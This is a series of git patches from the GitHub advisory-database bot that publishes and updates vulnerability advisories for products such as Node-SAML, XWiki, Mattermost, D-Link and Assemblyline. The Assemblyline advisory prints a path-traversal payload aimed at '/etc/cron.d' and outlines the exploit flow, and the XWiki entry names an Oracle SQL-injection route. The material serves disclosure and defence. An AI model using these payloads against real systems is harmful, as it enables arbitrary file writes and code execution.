"2025-07-25T12:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-cpq7-j57g-4c4c/GHSA-cpq7-j57g-4c4c.json b/advisories/unreviewed/2025/07/GHSA-cpq7-j57g-4c4c/GHSA-cpq7-j57g-4c4c.json new file mode 100644 index 0000000000000..99210add2b8c5 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-cpq7-j57g-4c4c/GHSA-cpq7-j57g-4c4c.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cpq7-j57g-4c4c", + "modified": "2025-07-25T12:31:18Z", + "published": "2025-07-25T12:31:18Z", + "aliases": [ + "CVE-2025-5253" + ], + "details": "Allocation of Resources Without Limits or Throttling vulnerability in Kron Technologies Kron PAM allows HTTP DoS.This issue affects Kron PAM: before 3.7.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5253" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-25-0178" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-770" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T12:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-g44j-j74m-35jc/GHSA-g44j-j74m-35jc.json b/advisories/unreviewed/2025/07/GHSA-g44j-j74m-35jc/GHSA-g44j-j74m-35jc.json new file mode 100644 index 0000000000000..8ec9a7ebee980 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-g44j-j74m-35jc/GHSA-g44j-j74m-35jc.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g44j-j74m-35jc", + "modified": "2025-07-25T12:31:18Z", + "published": "2025-07-25T12:31:18Z", + "aliases": [ + "CVE-2025-8155" + ], + "details": "A vulnerability has been found in D-Link DCS-6010L 1.15.03 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /vb.htm of the component Management Application. The manipulation of the argument paratest leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This vulnerability only affects products that are no longer supported by the maintainer.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8155" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317569" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317569" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.620531" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T12:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-j3w2-2p33-x67q/GHSA-j3w2-2p33-x67q.json b/advisories/unreviewed/2025/07/GHSA-j3w2-2p33-x67q/GHSA-j3w2-2p33-x67q.json new file mode 100644 index 0000000000000..be8d1b4a00da4 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-j3w2-2p33-x67q/GHSA-j3w2-2p33-x67q.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j3w2-2p33-x67q", + "modified": "2025-07-25T12:31:18Z", + "published": "2025-07-25T12:31:18Z", + "aliases": [ + "CVE-2025-8183" + ], + "details": "NULL Pointer Dereference in µD3TN via non-singleton destination Endpoint Identifier allows remote attacker to reliably cause DoS", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8183" + }, + { + "type": "WEB", + "url": "https://gitlab.com/d3tn/ud3tn/-/issues/255" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T10:15:36Z" + } +} \ No newline at end of file From ba7ce09c02795863f399fa4c2941308659e2e4a3 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 25 Jul 2025 13:33:55 +0000 Subject: [PATCH 145/323] Publish Advisories GHSA-526j-mv3p-f4vv GHSA-vr59-gm53-v7cq --- .../GHSA-526j-mv3p-f4vv/GHSA-526j-mv3p-f4vv.json | 8 ++++++-- .../GHSA-vr59-gm53-v7cq/GHSA-vr59-gm53-v7cq.json | 16 ++++++++++++++-- 2 files changed, 20 insertions(+), 4 deletions(-) diff --git a/advisories/github-reviewed/2025/07/GHSA-526j-mv3p-f4vv/GHSA-526j-mv3p-f4vv.json b/advisories/github-reviewed/2025/07/GHSA-526j-mv3p-f4vv/GHSA-526j-mv3p-f4vv.json index f154dfd42252e..548f16cde366c 100644 --- a/advisories/github-reviewed/2025/07/GHSA-526j-mv3p-f4vv/GHSA-526j-mv3p-f4vv.json +++ b/advisories/github-reviewed/2025/07/GHSA-526j-mv3p-f4vv/GHSA-526j-mv3p-f4vv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-526j-mv3p-f4vv", - "modified": "2025-07-24T17:35:59Z", + "modified": "2025-07-25T13:32:08Z", "published": "2025-07-24T14:19:17Z", "aliases": [ "CVE-2025-54379" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/lf-edge/ekuiper/security/advisories/GHSA-526j-mv3p-f4vv" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54379" + }, { "type": "WEB", "url": "https://github.com/lf-edge/ekuiper/commit/72c4918744934deebf04e324ae66933ec089ebd3" @@ -56,6 +60,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2025-07-24T14:19:17Z", - "nvd_published_at": null + "nvd_published_at": "2025-07-24T23:15:26Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2025/07/GHSA-vr59-gm53-v7cq/GHSA-vr59-gm53-v7cq.json b/advisories/github-reviewed/2025/07/GHSA-vr59-gm53-v7cq/GHSA-vr59-gm53-v7cq.json index 7f9ed237c422d..9415c15371a4f 100644 --- a/advisories/github-reviewed/2025/07/GHSA-vr59-gm53-v7cq/GHSA-vr59-gm53-v7cq.json +++ b/advisories/github-reviewed/2025/07/GHSA-vr59-gm53-v7cq/GHSA-vr59-gm53-v7cq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-vr59-gm53-v7cq", - "modified": "2025-07-24T18:09:02Z", + "modified": "2025-07-25T13:32:02Z", "published": "2025-07-24T18:09:01Z", "aliases": [ "CVE-2025-32429" @@ -59,6 +59,18 @@ "type": "WEB", "url": "https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-vr59-gm53-v7cq" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-32429" + }, + { + "type": "WEB", + "url": "https://github.com/xwiki/xwiki-platform/commit/dfd0744e9c18d24ac66a0d261dc6cafd1c209101" + }, + { + "type": "WEB", + "url": "https://github.com/xwiki/xwiki-platform/commit/f502b5d5fd36284a50890ad26d168b7d8dc80bd3" + }, { "type": "PACKAGE", "url": "https://github.com/xwiki/xwiki-platform" @@ -75,6 +87,6 @@ "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2025-07-24T18:09:01Z", - "nvd_published_at": null + "nvd_published_at": "2025-07-24T23:15:26Z" } } \ No newline at end of file From 8cff572903b72ce1fdff5bb19f179497324a8313 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 25 Jul 2025 14:10:35 +0000 Subject: [PATCH 146/323] Publish GHSA-m837-g268-mmv7 --- .../GHSA-m837-g268-mmv7.json | 92 +++++++++++++++++++ 1 file changed, 92 insertions(+) create mode 100644 advisories/github-reviewed/2025/07/GHSA-m837-g268-mmv7/GHSA-m837-g268-mmv7.json diff --git a/advisories/github-reviewed/2025/07/GHSA-m837-g268-mmv7/GHSA-m837-g268-mmv7.json b/advisories/github-reviewed/2025/07/GHSA-m837-g268-mmv7/GHSA-m837-g268-mmv7.json new file mode 100644 index 0000000000000..e4c4247430073 --- /dev/null +++ b/advisories/github-reviewed/2025/07/GHSA-m837-g268-mmv7/GHSA-m837-g268-mmv7.json @@ -0,0 +1,92 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m837-g268-mmv7", + "modified": "2025-07-25T14:08:50Z", + "published": "2025-07-25T14:08:50Z", + "aliases": [ + "CVE-2025-54369" + ], + "summary": "Node-SAML SAML Authentication Bypass", + "details": "Node-SAML loads the assertion from the (unsigned) original response document. This is different than the parts that are verified when checking signature. \n\nThis allows an attacker to modify authentication details within a valid SAML assertion. For example, in one attack it is possible to remove any character from the SAML assertion username.\n\nTo conduct the attack an attacker would need a validly signed document from the identity provider (IdP).\n\nIn fixing this we upgraded xml-crypto to v6.1.2 and made sure to process the SAML assertions from only verified/authenticated contents. This will prevent future variants from coming up.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "node-saml" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "3.1.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "npm", + "name": "@node-saml/node-saml" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.1.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 5.0.1" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/node-saml/node-saml/security/advisories/GHSA-m837-g268-mmv7" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54369" + }, + { + "type": "WEB", + "url": "https://github.com/node-saml/node-saml/commit/31ead9411ebc3e2385086fa9149b6c17732bca10" + }, + { + "type": "PACKAGE", + "url": "https://github.com/node-saml/node-saml" + }, + { + "type": "WEB", + "url": "https://github.com/node-saml/node-saml/releases/tag/v5.1.0" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287", + "CWE-347" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2025-07-25T14:08:50Z", + "nvd_published_at": "2025-07-24T23:15:26Z" + } +} \ No newline at end of file From 2db0c7fb8096ba1c8c639d21cf3cf3ac299bc3b7 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 25 Jul 2025 14:13:09 +0000 Subject: [PATCH 147/323] Publish GHSA-p9qm-p942-q3w5 --- .../GHSA-p9qm-p942-q3w5.json | 85 +++++++++++++++++++ 1 file changed, 85 insertions(+) create mode 100644 advisories/github-reviewed/2025/07/GHSA-p9qm-p942-q3w5/GHSA-p9qm-p942-q3w5.json diff --git a/advisories/github-reviewed/2025/07/GHSA-p9qm-p942-q3w5/GHSA-p9qm-p942-q3w5.json b/advisories/github-reviewed/2025/07/GHSA-p9qm-p942-q3w5/GHSA-p9qm-p942-q3w5.json new file mode 100644 index 0000000000000..6d147a6198e8f --- /dev/null +++ b/advisories/github-reviewed/2025/07/GHSA-p9qm-p942-q3w5/GHSA-p9qm-p942-q3w5.json @@ -0,0 +1,85 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p9qm-p942-q3w5", + "modified": "2025-07-25T14:11:00Z", + "published": "2025-07-25T14:11:00Z", + "aliases": [ + "CVE-2025-54385" + ], + "summary": "XWiki Platform vulnerable to SQL injection through XWiki#searchDocuments API", + "details": "### Impact\n\nIt's possible to execute any SQL query in Oracle by using the function like [DBMS_XMLGEN or DBMS_XMLQUERY](https://docs.oracle.com/en/database/oracle/oracle-database/19/arpls/DBMS_XMLGEN.html).\n\nThe XWiki#searchDocuments APIs are not sanitizing the query at all and even if they force a specific select, Hibernate allows using any native function in an HQL query (for example in the WHERE).\n\n### Patches\n\nThis has been patched in 16.10.6 and 17.3.0-rc-1.\n\n### Workarounds\n\nThere is no known workaround, other than upgrading XWiki.\n\n### References\n\nhttps://jira.xwiki.org/browse/XWIKI-22728\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)\n* Email us at [Security Mailing List](mailto:security@xwiki.org)", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.xwiki.platform:xwiki-platform-oldcore" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0" + }, + { + "fixed": "16.10.6" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.xwiki.platform:xwiki-platform-oldcore" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "17.0.0-rc1" + }, + { + "fixed": "17.3.0-rc-1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-p9qm-p942-q3w5" + }, + { + "type": "WEB", + "url": "https://github.com/xwiki/xwiki-platform/commit/7313dc9b533c70f14b7672379c8b3b63d1fd8f51" + }, + { + "type": "PACKAGE", + "url": "https://github.com/xwiki/xwiki-platform" + }, + { + "type": "WEB", + "url": "https://jira.xwiki.org/browse/XWIKI-22728" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20", + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2025-07-25T14:11:00Z", + "nvd_published_at": null + } +} \ No newline at end of file From 8ff94cb7cfa9ec2580347014a8f31f5e155fe211 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 25 Jul 2025 14:17:47 +0000 Subject: [PATCH 148/323] Publish GHSA-75jv-vfxf-3865 --- .../GHSA-75jv-vfxf-3865.json | 78 +++++++++++++++++++ 1 file changed, 78 insertions(+) create mode 100644 advisories/github-reviewed/2025/07/GHSA-75jv-vfxf-3865/GHSA-75jv-vfxf-3865.json diff --git a/advisories/github-reviewed/2025/07/GHSA-75jv-vfxf-3865/GHSA-75jv-vfxf-3865.json b/advisories/github-reviewed/2025/07/GHSA-75jv-vfxf-3865/GHSA-75jv-vfxf-3865.json new file mode 100644 index 0000000000000..e148c38ad2ccb --- /dev/null +++ b/advisories/github-reviewed/2025/07/GHSA-75jv-vfxf-3865/GHSA-75jv-vfxf-3865.json @@ -0,0 +1,78 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-75jv-vfxf-3865", + "modified": "2025-07-25T14:15:48Z", + "published": "2025-07-25T14:15:48Z", + "aliases": [], + "summary": "Assemblyline 4 service client vulnerable to Arbitrary Write through path traversal in Client code ", + "details": "**Path-Traversal -> Arbitrary File Write in Assemblyline Service Client**\n\n---\n\n## 1. Summary \nThe Assemblyline 4 **service client** (`task_handler.py`) accepts a SHA-256 value returned by the service **server** and uses it directly as a local file name. \n> No validation / sanitisation is performed.\n\nA **malicious or compromised server** (or any MITM that can speak to client) can return a path-traversal payload such as \n`../../../etc/cron.d/evil` \nand force the client to write the downloaded bytes to an arbitrary location on disk.\n\n---\n\n## 2. Affected Versions \n| Item | Value |\n|---|---|\n| **Component** | `assemblyline-service-client` |\n| **Repository** | [CybercentreCanada/assemblyline-service-client](https://github.com/CybercentreCanada/assemblyline-service-client) |\n| **Affected** | **All releases up to master branch.** |\n\n---\n\n## 4. Technical Details\n\n| Field | Content |\n|---|---|\n| **Location** | `assemblyline_service_client/task_handler.py`, inside `download_file()` |\n| **Vulnerable Line** | `file_path = os.path.join(self.tasking_dir, sha256)` |\n| **Root Cause** | The `sha256` string is taken directly from the service-server JSON response and used as a file name without any validation or sanitisation. |\n| **Exploit Flow** | 1. Attacker (service server) returns HTTP 200 for `GET /api/v1/file/../../../etc/cron.d/evil`.
2. Client writes the response body to `/etc/cron.d/evil`.
3. Achieves arbitrary file write (code execution if file is executable). |\n\n---\n\n## 5. Impact \n- **Integrity** – Overwrite any file writable by the service UID (often root). \n- **Availability** – Corrupt critical files or exhaust disk space. \n- **Code Execution** – Drop cron jobs, systemd units, or overwrite binaries.\n\n---\n\n## 6. Mitigation / Fix\n\n```python\nimport re\n\n_SHA256_RE = re.compile(r'^[0-9a-fA-F]{64}\\Z')\n\ndef download_file(self, sha256: str, sid: str) -> Optional[str]:\n if not _SHA256_RE.fullmatch(sha256):\n self.log.error(f\"[{sid}] Invalid SHA256: {sha256}\")\n self.status = STATUSES.ERROR_FOUND\n return None\n # or your preferred way to check if a string is a shasum.\n```\n---", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "assemblyline-service-client" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.6.0.stable11" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "assemblyline-service-client" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.6.1.dev0" + }, + { + "fixed": "4.6.1.dev138" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/CybercentreCanada/assemblyline/security/advisories/GHSA-75jv-vfxf-3865" + }, + { + "type": "WEB", + "url": "https://github.com/CybercentreCanada/assemblyline-service-client/commit/351414e7e96cc1f5640ae71ae51b939e8ba30900" + }, + { + "type": "PACKAGE", + "url": "https://github.com/CybercentreCanada/assemblyline-service-client" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-23" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2025-07-25T14:15:48Z", + "nvd_published_at": null + } +} \ No newline at end of file From bf065735287df4dd75e24d4d4fd1b1a1125e17e0 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 25 Jul 2025 14:52:32 +0000 Subject: [PATCH 149/323] Publish GHSA-455c-vqrf-mghr --- .../GHSA-455c-vqrf-mghr.json | 25 ++++++++++++++++--- 1 file changed, 22 insertions(+), 3 deletions(-) diff --git a/advisories/github-reviewed/2023/06/GHSA-455c-vqrf-mghr/GHSA-455c-vqrf-mghr.json b/advisories/github-reviewed/2023/06/GHSA-455c-vqrf-mghr/GHSA-455c-vqrf-mghr.json index 04b317e309d8e..150bc28891600 100644 --- a/advisories/github-reviewed/2023/06/GHSA-455c-vqrf-mghr/GHSA-455c-vqrf-mghr.json +++ b/advisories/github-reviewed/2023/06/GHSA-455c-vqrf-mghr/GHSA-455c-vqrf-mghr.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-455c-vqrf-mghr", - "modified": "2023-06-23T21:37:38Z", + "modified": "2025-07-25T14:50:30Z", "published": "2023-06-16T09:30:24Z", "aliases": [ "CVE-2023-2783" ], "summary": "Mattermost Server Missing Authorization vulnerability", - "details": "Mattermost Apps Framework fails to verify that a secret provided in the incoming webhook request allowing an attacker to modify the contents of the post sent by the Apps.\n\n", + "details": "Mattermost Apps Framework fails to verify that a secret provided in the incoming webhook request allowing an attacker to modify the contents of the post sent by the Apps.", "severity": [ { "type": "CVSS_V3", @@ -66,7 +66,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "6.0.0" }, { "fixed": "7.8.5" @@ -74,6 +74,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost-server/v6" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.0.0-20230511130429-1629a6ca7fed" + } + ] + } + ] } ], "references": [ From 7743166acd4e4508b15dc744123056ec5b09e009 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 25 Jul 2025 15:18:03 +0000 Subject: [PATCH 150/323] Publish GHSA-3wq5-3f56-v5xc --- .../GHSA-3wq5-3f56-v5xc.json | 40 ++++++++++++++++++- 1 file changed, 39 insertions(+), 1 deletion(-) diff --git a/advisories/github-reviewed/2023/03/GHSA-3wq5-3f56-v5xc/GHSA-3wq5-3f56-v5xc.json b/advisories/github-reviewed/2023/03/GHSA-3wq5-3f56-v5xc/GHSA-3wq5-3f56-v5xc.json index 9bdae38c5fe08..ebcbbe92024bf 100644 --- a/advisories/github-reviewed/2023/03/GHSA-3wq5-3f56-v5xc/GHSA-3wq5-3f56-v5xc.json +++ b/advisories/github-reviewed/2023/03/GHSA-3wq5-3f56-v5xc/GHSA-3wq5-3f56-v5xc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3wq5-3f56-v5xc", - "modified": "2025-07-09T17:59:38Z", + "modified": "2025-07-25T15:16:21Z", "published": "2023-03-31T12:30:16Z", "aliases": [ "CVE-2023-1777" @@ -102,6 +102,44 @@ "database_specific": { "last_known_affected_version_range": "<= 7.1.5" } + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost-server/v6" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0.0-20211025164829-f7a8147b825c" + }, + { + "fixed": "6.0.0-20230301145909-10be118d99a5" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.4.1-0.20211025164829-f7a8147b825c" + }, + { + "fixed": "1.4.1-0.20230301145909-10be118d99a5" + } + ] + } + ] } ], "references": [ From 4f0f967831c8d6a6c9dd5cdac5a34e4d434b9d81 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 25 Jul 2025 15:32:14 +0000 Subject: [PATCH 151/323] Advisory Database Sync --- .../GHSA-m2fx-wq5j-8657.json | 6 +- .../GHSA-p959-c7xj-w3cr.json | 10 +++- .../GHSA-wj5r-m28j-95q9.json | 10 +++- .../GHSA-p8pc-4q8f-r225.json | 6 +- .../GHSA-c5x2-97hm-x895.json | 30 +++++++++- .../GHSA-24m9-rp8m-h4jp.json | 49 ++++++++++++++++ .../GHSA-2v78-h87m-hpx9.json | 57 +++++++++++++++++++ .../GHSA-2x29-88x9-wfrj.json | 36 ++++++++++++ .../GHSA-346m-4qgc-hqv8.json | 37 ++++++++++++ .../GHSA-35qw-c8w7-fcg8.json | 37 ++++++++++++ .../GHSA-3fxq-g92j-92g5.json | 57 +++++++++++++++++++ .../GHSA-3g73-h9cm-2486.json | 36 ++++++++++++ .../GHSA-3g9v-mx9v-wmwv.json | 37 ++++++++++++ .../GHSA-3mgj-ppp2-8gvj.json | 57 +++++++++++++++++++ .../GHSA-43rg-xghf-cjwh.json | 33 +++++++++++ .../GHSA-456m-93fm-gff2.json | 37 ++++++++++++ .../GHSA-483p-f75x-jw75.json | 33 +++++++++++ .../GHSA-495q-r22g-59m9.json | 41 +++++++++++++ .../GHSA-4fc7-q565-7p9g.json | 36 ++++++++++++ .../GHSA-4fjg-wrmh-r9ch.json | 40 +++++++++++++ .../GHSA-4j4w-3wcx-mxg6.json | 37 ++++++++++++ .../GHSA-4jq7-688w-w4r4.json | 40 +++++++++++++ .../GHSA-4w5g-r898-rj85.json | 45 +++++++++++++++ .../GHSA-53qv-xvfg-rjr9.json | 49 ++++++++++++++++ .../GHSA-54gr-cf5g-5pjm.json | 40 +++++++++++++ .../GHSA-56gq-m2m7-qc85.json | 33 +++++++++++ .../GHSA-585v-w359-6rw5.json | 36 ++++++++++++ .../GHSA-58vg-w4wx-wp6p.json | 37 ++++++++++++ .../GHSA-5g77-7644-h27q.json | 33 +++++++++++ .../GHSA-5g8h-g27f-mh64.json | 37 ++++++++++++ .../GHSA-5pjf-mw33-c6c3.json | 40 +++++++++++++ .../GHSA-5wmp-9678-6384.json | 44 ++++++++++++++ .../GHSA-5x6v-ph8q-fg62.json | 45 +++++++++++++++ .../GHSA-62f3-xhhg-6p74.json | 33 +++++++++++ .../GHSA-637r-5w8j-mjg6.json | 41 +++++++++++++ .../GHSA-6gg7-c9v3-hv72.json | 44 ++++++++++++++ .../GHSA-6gw9-2x6r-hqw8.json | 37 ++++++++++++ .../GHSA-6p9w-8r99-f39c.json | 57 +++++++++++++++++++ .../GHSA-6r64-vv6h-j895.json | 33 +++++++++++ .../GHSA-733g-xvvm-2g6j.json | 57 +++++++++++++++++++ .../GHSA-73j2-c6c6-cr45.json | 53 +++++++++++++++++ .../GHSA-74qv-83cv-fw98.json | 33 +++++++++++ .../GHSA-76v9-cvv3-9m9p.json | 57 +++++++++++++++++++ .../GHSA-783m-53vh-rmp2.json | 36 ++++++++++++ .../GHSA-795c-qm5f-2827.json | 57 +++++++++++++++++++ .../GHSA-7975-5jgq-h46c.json | 56 ++++++++++++++++++ .../GHSA-7fhw-47q5-mgv8.json | 49 ++++++++++++++++ .../GHSA-7m5p-v483-rc7r.json | 33 +++++++++++ .../GHSA-7q3f-xf6v-wv4w.json | 37 ++++++++++++ .../GHSA-7rw5-9g4x-gf48.json | 48 ++++++++++++++++ .../GHSA-7xh7-w5g7-62qv.json | 33 +++++++++++ .../GHSA-8249-rqx5-qf75.json | 57 +++++++++++++++++++ .../GHSA-833c-qfxr-5pp5.json | 41 +++++++++++++ .../GHSA-84fw-vffg-g7cp.json | 52 +++++++++++++++++ .../GHSA-8gx9-2mgx-hm7j.json | 45 +++++++++++++++ .../GHSA-8m46-hm8p-v8rj.json | 45 +++++++++++++++ .../GHSA-8wmc-rr78-8pf9.json | 48 ++++++++++++++++ .../GHSA-8x8p-vfxm-77vf.json | 37 ++++++++++++ .../GHSA-926h-7qf4-c3hq.json | 45 +++++++++++++++ .../GHSA-93f5-rwwh-v8p5.json | 53 +++++++++++++++++ .../GHSA-99gr-q2p8-x55m.json | 36 ++++++++++++ .../GHSA-9mf6-h5qw-3r5p.json | 45 +++++++++++++++ .../GHSA-9p64-9rxj-34pm.json | 40 +++++++++++++ .../GHSA-9qw8-xx45-2wp7.json | 57 +++++++++++++++++++ .../GHSA-c2fx-76wh-p9mq.json | 40 +++++++++++++ .../GHSA-c3c4-j5v2-q687.json | 33 +++++++++++ .../GHSA-c6g2-84gg-hc38.json | 48 ++++++++++++++++ .../GHSA-c7xc-fv22-2pq3.json | 36 ++++++++++++ .../GHSA-cfcc-w9g2-336j.json | 44 ++++++++++++++ .../GHSA-cfr6-wmxx-cfg2.json | 57 +++++++++++++++++++ .../GHSA-cfvr-4cm5-x2r3.json | 33 +++++++++++ .../GHSA-ch6p-gm8m-r8fm.json | 57 +++++++++++++++++++ .../GHSA-cmm8-gw4m-26cw.json | 40 +++++++++++++ .../GHSA-crh2-v64q-fq49.json | 40 +++++++++++++ .../GHSA-cv9m-prxm-594h.json | 33 +++++++++++ .../GHSA-cvm7-wwgm-g3q3.json | 37 ++++++++++++ .../GHSA-f2rv-3fq7-vhpv.json | 56 ++++++++++++++++++ .../GHSA-f462-4c2j-6qcw.json | 57 +++++++++++++++++++ .../GHSA-f5fc-m65h-gr9j.json | 41 +++++++++++++ .../GHSA-f75j-r62m-hxmw.json | 49 ++++++++++++++++ .../GHSA-ffxp-vqfg-26jp.json | 57 +++++++++++++++++++ .../GHSA-fpr2-pgq7-qwg4.json | 40 +++++++++++++ .../GHSA-fr6m-vhh9-9qj8.json | 37 ++++++++++++ .../GHSA-frwj-r649-j5gf.json | 40 +++++++++++++ .../GHSA-fwp5-77ch-c7c8.json | 36 ++++++++++++ .../GHSA-g98p-wqr8-r32r.json | 6 +- .../GHSA-gcxf-rh2w-2m9p.json | 53 +++++++++++++++++ .../GHSA-gvh3-f4g3-c9ff.json | 36 ++++++++++++ .../GHSA-gw8j-hp25-g47g.json | 37 ++++++++++++ .../GHSA-h43f-3486-2w3c.json | 44 ++++++++++++++ .../GHSA-h56q-f656-qf6w.json | 48 ++++++++++++++++ .../GHSA-h7p2-xjmg-5hqg.json | 48 ++++++++++++++++ .../GHSA-h9m7-cj39-6vrg.json | 56 ++++++++++++++++++ .../GHSA-hcf7-cj24-hf8m.json | 49 ++++++++++++++++ .../GHSA-hv89-cw42-xpf3.json | 40 +++++++++++++ .../GHSA-hxvp-23fc-849f.json | 37 ++++++++++++ .../GHSA-j3rr-hppv-g55q.json | 57 +++++++++++++++++++ 